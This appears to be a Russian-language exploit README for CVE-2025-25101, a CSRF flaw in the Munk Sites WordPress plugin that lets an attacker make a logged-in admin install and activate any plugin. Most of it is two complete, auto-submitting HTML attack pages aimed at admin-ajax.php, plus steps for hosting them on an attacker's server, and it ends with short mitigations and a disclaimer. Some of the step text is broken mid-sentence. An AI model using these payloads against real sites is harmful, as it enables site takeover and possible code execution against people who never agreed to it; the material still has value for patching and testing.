
Плагин Munk Sites для WordPress <= 1.0.7 – CSRF уязвимость, приводящая к произвольной установке плагинов
CVE-2025-25101 — это уязвимость Межсайтовой подделки запроса (CSRF) в плагине MetricThemes Munk Sites для WordPress (версии ≤ 1.0.7).
Эта уязвимость позволяет неаутентифицированному злоумышленнику обмануть администратора, заставив его установить и активировать произвольные плагины, что потенциально может привести к удаленному выполнению кода (RCE) или компрометации сайта.
<= 1.0.7Любая версия, где плагин активен| Балл | Серьезность | Версия | Строка вектора |
|---|
| 9.6 | 🔥 КРИТИЧЕСКАЯ | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
Дефект CSRF в плагине Munk Sites позволяет злоумышленнику заставить вошедшего в систему администратора WordPress установить и активировать любой плагин WordPress без его согласия.
Это делается путем эксплуатации незащищенного запроса к admin-ajax.php, в котором отсутствует проверка CSRF-токена.
Эта полезная нагрузка заставляет жертву установить плагин hello-world.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Installation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #5bc0de; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Installing plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_install_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
Эта полезная нагрузка заставляет жертву активировать плагин hello-world.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Activation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #f0ad4e; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Activating plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_active_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
install.html и activate.html) на сервере, контролируемом злоумышленником.install.html.activate.html.hello-world будет установлен и активирован без согласия администратора!admin-ajax.php с помощью правил безопасности в .htaccess или конфигурации Nginx.wp_nonce_field() и check_admin_referer().⚠️ Этот эксплойт предназначен только для образовательных целей и исследований в области безопасности.
⚠️ Несанкционированное использование против систем без явного разрешения незаконно.
⚠️ Автор не несет ответственности за любое неправомерное использование этого кода.
Если вы считаете это исследование ценным, не стесняйтесь ⭐ поставить звезду репозиторию и внести свой вклад, сообщая о новых уязвимостях.
Автор: Nxploit | Khaled Alenazi